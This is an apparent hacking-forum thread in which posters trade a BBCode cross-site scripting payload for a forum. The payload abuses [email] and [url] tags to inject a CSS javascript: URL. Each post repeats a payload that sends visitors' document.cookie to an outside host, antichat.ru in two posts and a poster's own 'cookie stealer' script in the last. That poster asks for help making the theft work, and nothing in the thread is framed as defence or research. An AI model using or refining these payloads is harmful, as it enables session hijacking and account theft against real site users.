No sploit but it have XSS HTML: [email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Hmm they must have patched it becuase everything before .com get's filterd out, and you see the xss? .com">[email protected] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
oooo, i get it except i have 1 more question, HTML: [email]black@bandit[url=http://www.google.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://mysite/webmaster/cookie32.php?"+document.cookie);` and for some reason it's not directing it to my cookie stealer i'm guessing it's due to the document.images, so in order for this to work do i need to make a dynamic signature?
